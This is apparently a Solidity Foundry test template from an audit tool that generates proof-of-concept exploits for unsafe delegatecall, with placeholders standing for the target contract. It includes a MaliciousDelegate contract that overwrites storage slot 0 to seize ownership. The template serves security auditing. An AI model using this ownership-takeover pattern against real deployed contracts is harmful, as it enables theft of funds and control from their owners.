// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "forge-std/console.sol";

// {{CUSTOM_IMPORTS}}

/**
 * @title {{CONTRACT_NAME}} Delegatecall Exploit PoC
 * @notice Proof of Concept for unsafe delegatecall target control
 * @dev Generated by MIESC PoC Generator
 *
 * Vulnerability: {{DESCRIPTION}}
 * Severity: {{SEVERITY}}
 * Target Function: {{TARGET_FUNCTION}}
 * Generated: {{TIMESTAMP}}
 */
contract {{CONTRACT_NAME}}DelegatecallTest is Test {
    address public target;
    address public attacker;
    MaliciousDelegate public malicious;

    function setUp() public {
        attacker = makeAddr("attacker");
        vm.deal(attacker, {{ATTACKER_BALANCE}});
        malicious = new MaliciousDelegate(attacker);

        // {{FORK_CONFIG}}
        // target = address(new {{CONTRACT_NAME}}());
        // {{CUSTOM_SETUP}}
    }

    function test_exploit_delegatecall_target_control() public {
        console.log("=== Starting delegatecall target-control PoC ===");

        vm.prank(attacker);
        (bool success,) = target.call(
            abi.encodeWithSignature("{{TARGET_FUNCTION}}(address)", address(malicious))
        );

        console.log("Delegatecall path success:", success);
        // Add project-specific storage ownership assertions after binding the target.
    }
}

contract MaliciousDelegate {
    address public attacker;

    constructor(address _attacker) {
        attacker = _attacker;
    }

    function overwriteOwner() external {
        assembly {
            sstore(0, caller())
        }
    }
}
